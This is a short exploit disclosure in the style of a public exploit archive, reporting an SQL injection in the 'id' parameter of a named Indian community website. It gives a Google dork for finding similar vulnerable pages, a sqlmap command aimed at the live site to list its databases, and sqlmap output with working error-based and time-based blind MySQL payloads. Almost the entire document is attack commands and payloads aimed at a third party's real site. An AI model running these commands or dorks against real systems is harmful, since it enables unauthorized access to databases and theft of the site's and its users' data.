##################################################
# Exploit Title: SNEA India Community SQLi Vuln.
# Google Dork: inurl:"index.php?id=" intext:"Today" intitle:"SNEA"
# Date: 05.06.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
##################################################
# PoC: sqlmap -u "http://www.sneaindia.com/index.php?id=15'" --dbs --random-agent
[+] sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-1653 OR 1 GROUP BY CONCAT(0x71626a7171,(SELECT (CASE WHEN (7305=7305) THEN 1 ELSE 0 END)),0x71716a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (3613=3613) THEN SLEEP(5) ELSE 3613 END)
---
[02:16:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
##################################################